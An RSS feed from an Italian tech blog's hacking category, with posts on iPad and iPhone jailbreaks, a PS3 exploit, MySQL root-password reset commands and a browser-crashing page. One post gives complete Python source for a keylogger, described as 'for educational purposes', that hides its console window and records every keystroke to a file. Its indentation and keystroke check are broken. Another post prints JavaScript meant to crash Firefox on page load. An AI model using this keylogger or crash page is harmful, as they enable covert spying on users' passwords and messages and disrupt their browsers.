<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>
<channel>
	<title>Nothing2Hide &#187; Hacking</title>
	<atom:link href="http://www.n2h.it/category/hacking/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.n2h.it</link>
	<description>Notizie, trucchi, recensioni, curiosità e guide per non perdersi nel mondo di Internet e per sfruttare al meglio le potenzialità del proprio computer.</description>
	<lastBuildDate>Fri, 02 Sep 2011 16:39:02 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.6</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Jailbreak dell&#8217;iPad già effettuato!</title>
		<link>http://www.n2h.it/hacking/jailbreak-dellipad-gia-effettuato/</link>
		<comments>http://www.n2h.it/hacking/jailbreak-dellipad-gia-effettuato/#comments</comments>
		<pubDate>Wed, 07 Apr 2010 09:37:11 +0000</pubDate>
		<dc:creator>davide</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[apple]]></category>
		<category><![CDATA[ipad]]></category>
		<category><![CDATA[jailbreak]]></category>
		<guid isPermaLink="false">http://www.n2h.it/?p=4535</guid>
		<description><![CDATA[A tempo di record c&#8217;è già chi è riuscito ad effettuare il jailbreak dell&#8217; iPad sfruttando, a quanto sembra, un exploit del browser. Una volta ottenuta la possibilità di accedere al sistema con l&#8217;utenza di root è virtualmente possibile installare qualsiasi applicazione bypassando tutte le fastidiose restrizioni imposte da Apple, proprio come avviene già da [...]<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></description>
			<content:encoded><![CDATA[<p>A tempo di record c&#8217;è già chi è riuscito ad effettuare il <strong>jailbreak dell&#8217; iPad</strong> sfruttando, a quanto sembra, un exploit del browser. Una volta ottenuta la possibilità di accedere al sistema con l&#8217;utenza di root è virtualmente possibile installare qualsiasi applicazione bypassando tutte le fastidiose restrizioni imposte da Apple, proprio come avviene già da parecchio tempo con l&#8217;<a href="http://www.n2h.it/cellulari/jailbreak-dell-iphone-con-firmware-3-1-3-da-windows-o-mac-con-redsn0w/"><strong>iPhone</strong></a>.<span id="more-4535"></span></p>
<p>Ecco di seguito il video che certifica l&#8217;avvenuto <strong>jailbreak</strong>:<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="588" height="340" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://www.youtube.com/v/dgHNayVtHkQ&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="588" height="340" src="http://www.youtube.com/v/dgHNayVtHkQ&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.n2h.it/hacking/jailbreak-dellipad-gia-effettuato/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PS3 Hack: scoperto e rilasciato il primo exploit per la Playstation 3</title>
		<link>http://www.n2h.it/hardware/ps3-hack-scoperto-e-rilasciato-il-primo-exploit-per-la-playstation-3/</link>
		<comments>http://www.n2h.it/hardware/ps3-hack-scoperto-e-rilasciato-il-primo-exploit-per-la-playstation-3/#comments</comments>
		<pubDate>Mon, 01 Feb 2010 20:20:42 +0000</pubDate>
		<dc:creator>davide</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Hardware]]></category>
		<category><![CDATA[console]]></category>
		<category><![CDATA[ps3]]></category>
		<guid isPermaLink="false">http://www.n2h.it/?p=4038</guid>
		<description><![CDATA[
George Hotz, hacker già famoso per aver trovato per primo il modo per effettuare l&#8217;unlock dell&#8217;iPhone, ha annunciato giusto pochi giorni fa di aver effettuato con successo l&#8217;hacking di una console PS3 riuscendo ad installare ed eseguire un software creato ad hoc.
La PS3 si caratterizza per il fatto di integrare un complesso sistema di protezione [...]<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.n2h.it/blog/wp-content/uploads/2010/02/ps3.jpg"><img class="alignnone size-full wp-image-4040" title="ps3" src="http://www.n2h.it/blog/wp-content/uploads/2010/02/ps3.jpg" alt="ps3" width="383" height="450" /></a><br />
George Hotz, hacker già famoso per aver trovato per primo il modo per effettuare l&#8217;<strong><a href="http://www.n2h.it/hardware/jailbreak-dell’-iphone-con-firmware-3-1-2-su-windows/">unlock dell&#8217;iPhone</a></strong>, ha annunciato giusto pochi giorni fa di aver effettuato con successo l&#8217;<strong>hacking di una console PS3</strong> riuscendo ad installare ed eseguire un software creato ad hoc.</p>
<p>La <strong>PS3</strong> si caratterizza per il fatto di integrare un complesso sistema di protezione che consente la sola esecuzione di software firmato digitalmente: l&#8217;<strong>exploit</strong> trovato da Hontz consente di bypassare in maniera piuttosto &#8220;semplice&#8221; questo sistema di protezione, consentendo perciò di eseguire all&#8217;interno della console giochi o comunque programmi non originali.<span id="more-4038"></span></p>
<p>Di fatto l&#8217;exploit è stato testato sulle versioni 2.4.2 e 3.10 ma, a detta dell&#8217;autore, dovrebbe funzionare anche su tutte le altre versioni della console. Ora che l&#8217;exploit è stato reso pubblico, probabilmente assisteremo ad una serie di numerose e veloci evoluzioni dello scenario che vedrà aprirsi una vera e propria competizione tra la <strong>community degli hacker</strong> (che continuerà a rilasciare versioni sempre più perfezionate e stabili di loader e software vari) e gli sviluppatori della Sony che cercheranno di correre ai ripari il più in fretta possibile rilasciando nuovi firmware e patch.</p>
<p>Nel frattempo, coloro che hanno più familiarità con la programmazione in C e l&#8217;elettronica, potranno provare a <a href="http://geohot.com/ps3_exploit.zip">scaricare ed analizzare l&#8217;exploit</a> che è disponibile per il download sul <a href="http://geohotps3.blogspot.com/2010/01/heres-your-silver-platter.html" target="_blank">blog dell&#8217;autore</a></p>
<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.n2h.it/hardware/ps3-hack-scoperto-e-rilasciato-il-primo-exploit-per-la-playstation-3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Come recuperare la password di root di un database MySQL</title>
		<link>http://www.n2h.it/hacking/come-recuperare-la-password-di-root-di-un-database-mysql/</link>
		<comments>http://www.n2h.it/hacking/come-recuperare-la-password-di-root-di-un-database-mysql/#comments</comments>
		<pubDate>Wed, 07 Oct 2009 07:52:32 +0000</pubDate>
		<dc:creator>davide</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[mysql]]></category>
		<guid isPermaLink="false">http://www.n2h.it/?p=3071</guid>
		<description><![CDATA[
MySQL è probabilmente il più diffuso ed utilizzato database relazionale gratuito in circolazione e, partner preferito dalle applicazioni PHP, rappresenta il DBMS di riferimento in tutte le piattaforme LAMP. Di fatto MySQL deve la sua larga diffusione a due fattori fondamentali:
la disponibilità su per più piattaforme: ne esistono versioni sia per Linux/Unix che per Windows
le [...]<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.n2h.it/blog/wp-content/uploads/2009/10/mysql.jpg"><img class="alignnone size-full wp-image-3072" title="mysql" src="http://www.n2h.it/blog/wp-content/uploads/2009/10/mysql.jpg" alt="mysql" width="300" height="304" /></a><br />
<strong>MySQL</strong> è probabilmente il più diffuso ed utilizzato database relazionale gratuito in circolazione e, partner preferito dalle applicazioni PHP, rappresenta il DBMS di riferimento in tutte le <strong>piattaforme LAMP</strong>. Di fatto MySQL deve la sua larga diffusione a due fattori fondamentali:</p>
<ol>
<li>la disponibilità su per più piattaforme: ne esistono versioni sia per Linux/Unix che per Windows</li>
<li>le sue ottime performances in termini di prestazioni e velocità, molto elevate in rapporto alle risorse hardware necessarie</li>
</ol>
<p>Ad ogni <strong>database MySQL</strong> è normalmente associato un <strong>utente root </strong>con pieni poteri che consente di gestirne ed amministrarne ogni funzionalità. Questo ovviamente implica che se per caso (o per sfortuna) se ne perde la password, il database diventa praticamente inutilizzabile. Di seguito vedremo due metodi per <strong>recuperare la password di root di un database MySQL</strong>.<span id="more-3071"></span></p>
<h3>Metodo 1</h3>
<ul>
<li>Arrestate tutti i processi mysqld e mysqld_safe:
<pre class="source-code">#pkill mysql
#pkill mysql-safe</pre>
</li>
<li>Create il file /root/reset-mysql-password con il seguente contenuto:
<pre class="source-code">UPDATE mysql.user SET Password=PASSWORD(’newpA$$w0rd’) WHERE User=’root’;
FLUSH PRIVILEGES;</pre>
</li>
<li>Per effettuare il reset della password impostando quella scelta da voi, avviate il MySQL daemon in modalità safe passando il file precendente come input:
<pre class="source-code">#mysqld_safe –init-file=/root/reset-mysql-password &amp;</pre>
</li>
<li>Cancellate il file di inizializzazione, fermate il porcesso in modalità safe ed avviate MySQL normalmente:
<pre class="source-code">#rm /root/reset-mysql-password
#pkill mysql-safe
#/etc/init.d/mysql start</pre>
</li>
<li>Provate a collegarvi con la nuova password utilizzando il comando seguente:
<pre class="source-code">#mysql -u root –p</pre>
</li>
</ul>
<h3>Metodo 2</h3>
<ul>
<li>Arrestate tutti i processi mysqld e mysqld_safe:
<pre class="source-code">#pkill mysql
#pkill mysql-safe</pre>
</li>
<li>Per effettuare il reset della passsord di root avviate MySQL in modalità safe con i seguenti parametri:
<pre class="source-code">#mysqld_safe –skip-grant-tables –skip-networking &amp;</pre>
<p>In questa modalità chiunque può collegarsi al server ed effettuare qualunque operazione</li>
<li>Collegatevi al database come root (non vi servirà la password):
<pre class="source-code"># mysql -u root mysql</pre>
</li>
<li>Modificate la password utilizzando la seguente query SQL:
<pre class="source-code">UPDATE user SET Password=PASSWORD(’newpA$$’) WHERE User=’root’;
mysql&gt; FLUSH PRIVILEGES;</pre>
</li>
<li>Dopo il cambio della password riavviate MySQL normalmente:
<pre class="source-code">#pkill mysql-safe
#/etc/init.d/mysql start</pre>
</li>
<li>Provate a collegarvi con la nuova password utilizzando il comando seguente:
<pre class="source-code">#mysql -u root –p</pre>
</li>
</ul>
<p>Via <a href="http://www.shahryary.org/how-to-hack-mysql-root-password/" target="_blank">Shahryary</a></p>
<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.n2h.it/hacking/come-recuperare-la-password-di-root-di-un-database-mysql/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Come creare un keylogger in soli 5 minuti</title>
		<link>http://www.n2h.it/hacking/come-creare-un-keylogger-in-soli-5-minuti/</link>
		<comments>http://www.n2h.it/hacking/come-creare-un-keylogger-in-soli-5-minuti/#comments</comments>
		<pubDate>Wed, 30 Sep 2009 07:58:48 +0000</pubDate>
		<dc:creator>davide</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<guid isPermaLink="false">http://www.n2h.it/?p=3025</guid>
		<description><![CDATA[
Come tutti sicuramente saprete, un keylogger è un programma in grado di intercettare tutto ciò che l&#8217;utente digita sulla tastiera del proprio computer. E suppongo sappiate altrettanto bene che, proprio per questa sua caratteristica, il keylogger è un software che non sempre si presta ad usi propriamente leciti, tant&#8217;è vero che ormai quasi tutti gli [...]<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.n2h.it/blog/wp-content/uploads/2009/09/computer-keyboard.jpg"><img class="alignnone size-full wp-image-3031" title="computer-keyboard" src="http://www.n2h.it/blog/wp-content/uploads/2009/09/computer-keyboard.jpg" alt="computer keyboard" width="450" height="345" /></a><br />
Come tutti sicuramente saprete, un <strong>keylogger</strong> è un programma in grado di <strong>intercettare tutto ciò che l&#8217;utente digita sulla tastiera</strong> del proprio computer. E suppongo sappiate altrettanto bene che, proprio per questa sua caratteristica, il keylogger è un software che non sempre si presta ad usi propriamente leciti, tant&#8217;è vero che ormai quasi tutti gli antivirus dispongono di funzionalità in grado di <strong>riconoscere la presenza di un keylogger</strong> attivo in background.</p>
<p>Di fatto quindi l&#8217;<strong>installazione di un keylogger</strong> su un computer che non sia il proprio o comunque ad insaputa del legittimo proprietario, si configura come un vero e proprio reato di violazione della privacy: i dati intercettati (come ad esempio sessioni di chat, username e <a href="http://www.n2h.it/internet/come-trovare-la-password-di-facebook/">password di Facebook</a> o dell&#8217; home banking, email, &#8230;) infatti vengono normalmente salvati su un file di log che il possessore del keylogger recupera in un secondo momento o che addirittura gli vengono inviati automaticamente via email.</p>
<p>A scopo puramente didattico vedremo come sia possibile <strong>creare un semplice keylogger</strong> completamente funzionante, sfruttando la poternza di <strong>Python</strong>. Di seguito i passi da seguire:</p>
<ol>
<li>Scaricate ed installate i software necessari:
<ul>
<li>Python 2.6: <a href="http://www.python.org/" target="_blank">http://www.python.org/</a></li>
<li>Pyhook per Python 2.6: <a href="http:/pyhook.sourceforge.net" target="_blank">pyhook.sourceforge.net</a></li>
<li>Python for Windows Extensions: <a href="http://sourceforge.net/projects/pywin32/" target="_blank">http://sourceforge.net/projects/pywin32/</a></li>
</ul>
</li>
<li>Dal menu di avvio selezionate &#8220;<em><strong>Python 2.6 &gt; PythonWin</strong></em>&#8221; per avviare l&#8217;editor</li>
<li>Dal menù selezionate &#8220;<em><strong>File &gt; New</strong></em>&#8220;, quindi scegliete l&#8217;opzione &#8220;<em><strong>Python Script</strong></em>&#8221; e date &#8220;<em><strong>OK</strong></em>&#8220;</li>
<li>Incollate il seguente sorgente (attenzione alle indentazioni) o in alternativa scaricate direttamente il file da <a href="http://www.n2h.it/downloads/logger.zip">questo link</a>:
<pre class="source-code">import win32api
import win32console
import win32gui
import pythoncom, pyHook
win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)
def OnKeyboardEvent(event):
  if event.Ascii==5:
    _exit(1)
 if event.Ascii != 0 or 8:
   f=open('c:\output.txt','r')
   buffer=f.read()
   f.close()
   f=open('c:\output.txt','w')
   keylogs=chr(event.Ascii)
   if event.Ascii==13:
     keylogs='/n'
   buffer += keylogs
   f.write(buffer)
   f.close()
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()</pre>
</li>
<li>Salvate il file in <strong><em>c:\</em></strong> come &#8220;<strong><em>logger.py</em></strong>&#8220;, quindi da <em><strong>PythonWin</strong></em> digitate <strong>CTRL+R</strong>: il keylogger verrrà avviato in background e fino a quando rimarrà in esecuzione registrerà sul file &#8220;<strong><em>C:\output.txt</em></strong>&#8221; tutto ciò che verrà digitato sulla tastiera.</li>
</ol>
<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.n2h.it/hacking/come-creare-un-keylogger-in-soli-5-minuti/feed/</wfw:commentRss>
		<slash:comments>14</slash:comments>
		</item>
		<item>
		<title>Come creare in pochi istanti una pagina web in grado di mandare in crash Firefox</title>
		<link>http://www.n2h.it/hacking/come-creare-in-pochi-istanti-una-pagina-web-in-grado-di-mandare-in-crash-firefox/</link>
		<comments>http://www.n2h.it/hacking/come-creare-in-pochi-istanti-una-pagina-web-in-grado-di-mandare-in-crash-firefox/#comments</comments>
		<pubDate>Tue, 25 Aug 2009 07:31:14 +0000</pubDate>
		<dc:creator>davide</dc:creator>
				<category><![CDATA[Firefox]]></category>
		<category><![CDATA[Hacking]]></category>
		<guid isPermaLink="false">http://www.n2h.it/?p=2859</guid>
		<description><![CDATA[
Nonostante Firefox si sia attestato come un prodotto ormai maturo e molto stabile presenta anche lui qualche vulnerabilità e bug. Il problema è che se tale difetto può causare addirittura il crash del browser, allora si tratta di un problema piuttosto grave. Di seguito vedremo una dimostrazione pratica di come una pagina HTML contentente un [...]<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.n2h.it/blog/wp-content/uploads/2009/08/firefox-crash.jpg"><img class="alignnone size-full wp-image-2861" title="firefox-crash" src="http://www.n2h.it/blog/wp-content/uploads/2009/08/firefox-crash.jpg" alt="firefox crash" width="220" height="258" /></a><br />
Nonostante <strong>Firefox</strong> si sia attestato come un prodotto ormai maturo e molto stabile presenta anche lui qualche <strong>vulnerabilità e bug</strong>. Il problema è che se tale difetto può causare addirittura il <strong>crash del browser</strong>, allora si tratta di un problema piuttosto grave. Di seguito vedremo una dimostrazione pratica di come una pagina HTML contentente un semplicissimo Javascript  possa <strong>mandare in crash Firefox </strong>in maniera praticamente istantanea. Ecco come procedere per provare in prima persona:<span id="more-2859"></span></p>
<ul>
<li>Create un nuovo file con estensione &#8220;<em>.htm</em>&#8220;</li>
<li>Aprite il file e copiatevi all&#8217;interno il seguente contenuto:
<pre class="source-code">&lt;html&gt;
&lt;head&gt;
&lt;script&gt;
var a;
for(i=0;i&lt;65536;i++){
  document.write(a+=String.fromCharCode(i));
}
&lt;/script&gt;
&lt;/head&gt;
&lt;body/&gt;
&lt;/html&gt;</pre>
</li>
<li>Chiudete e salvate il file</li>
<li>Avviate Firefox e provate un po&#8217; a vedere cosa succede aprendo (anche il locale) il file appena creato <img src='http://www.n2h.it/blog/wp-includes/images/smilies/icon_wink.gif' alt="icon wink" class='wp-smiley' title="Come creare in pochi istanti una pagina web in grado di mandare in crash Firefox" /> </li>
</ul>
<p>I più esperti potrebbero obiettare che un loop Javascript particolarmente oneroso in termini di risorse viene di solito immediatamente segnalato dal browser che è in grado di interrromperne l&#8217;esecuzione: il &#8220;bello&#8221; però è che, per qualche strano motivo, questo non avviene utilizzando questa particolare routine JS.</p>
<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.n2h.it/hacking/come-creare-in-pochi-istanti-una-pagina-web-in-grado-di-mandare-in-crash-firefox/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Come sbloccare l&#8217; iPhone con firmware 3.0.1</title>
		<link>http://www.n2h.it/hacking/come-sbloccare-l-iphone-con-firmware-301/</link>
		<comments>http://www.n2h.it/hacking/come-sbloccare-l-iphone-con-firmware-301/#comments</comments>
		<pubDate>Sat, 01 Aug 2009 11:43:33 +0000</pubDate>
		<dc:creator>davide</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[iphone]]></category>
		<guid isPermaLink="false">http://www.n2h.it/?p=2721</guid>
		<description><![CDATA[Solo poche ore fa Apple ha rilasciato il nuovo firmware 3.0.1 per iPhone 3G 3GS 3 2G, da non confondere ovviamente con il firmware 3.1 che è ancora in fase di sviluppo e test. Questo aggiornamento, rilasciato a poca distanza di tempo dalla versione 3.0, corregge una grave vulnerabilità nel software di gestione degli SMS [...]<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.n2h.it/blog/wp-content/uploads/2009/08/iphone-3g.jpg"><img class="size-full wp-image-2722 alignleft" title="iphone-3g" src="http://www.n2h.it/blog/wp-content/uploads/2009/08/iphone-3g.jpg" alt="iphone 3g" width="148" height="169" /></a>Solo poche ore fa Apple ha rilasciato il <strong>nuovo firmware 3.0.1 per iPhone 3G 3GS 3 2G</strong>, da non confondere ovviamente con il <strong>firmware 3.1</strong> che è ancora in fase di sviluppo e test. Questo aggiornamento, rilasciato a poca distanza di tempo dalla versione 3.0, corregge una grave vulnerabilità nel software di gestione degli SMS che potebbe consentire ad un utente malintenzionato di prendere il controllo di un iPhone ad insaputa del suo possessore.</p>
<p>Ovviamente il problema è che ogniqualvolta viene aggiornato il <strong>firmware dell&#8217; iPhone</strong> si perde anche l&#8217;eventuale sblocco effettuato sulla versione precedente&#8230; Fortunatamente però c&#8217;è la <a href="http://twitter.com/iphone_dev/status/3060777282" target="_blank">conferma ufficiale da parte dell&#8217; iPhone Dev Team</a> che anche la versione 3.0.1 è sbloccabile tranquillamente con <strong>Redsn0w 0.8.</strong><span id="more-2721"></span></p>
<p>La procedura è la stessa di sempre solo che va applicata puntando alla versione 3.0 del firmware:</p>
<ol>
<li>Scaricate l&#8217; iPhone OS 3.0 adatto al vostro modello:
<ul>
<li><a href="http://www.tinyurl.com/quickpwn3">iPhone firmware 3.0</a> (filename: <strong>iPhone1,1_3.0_7A341_Restore.ipsw</strong>)</li>
<li><a href="http://www.tinyurl.com/quickpwn4"> iPhone 3G firmware 3.0</a> (filename: <strong>iPhone1,2_3.0_7A341_Restore.ipsw</strong>)</li>
<li><a href="http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/061-6582.20090617.LlI87/iPhone2,1_3.0_7A341_Restore.ipsw"> iPhone 3GS firmware 3.0</a> (filename: <strong>iPhone2,1_3.0_7A341_Restore.ipsw</strong> )</li>
</ul>
</li>
<li>Scaricate <a title="Download Redsn0w 0.8" href="http://www.blogsdna.com/3924/download-redsn0w-08-to-jailbreak-iphone-3gs-30.htm" target="_blank">Redsn0w 0.8</a></li>
<li>Lanciate Redsnow e seguite le istruzioni: quando vi verrà richiesto di selezionare il firmware, scegliete la versione 3.0 e non la 3.0.1. La procedura funziona tranquillamente e consente lo sblocco del firmware 3.0.1</li>
</ol>
<p><strong><br />
</strong></p>
<p><strong><br />
</strong></p>
<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></content:encoded>
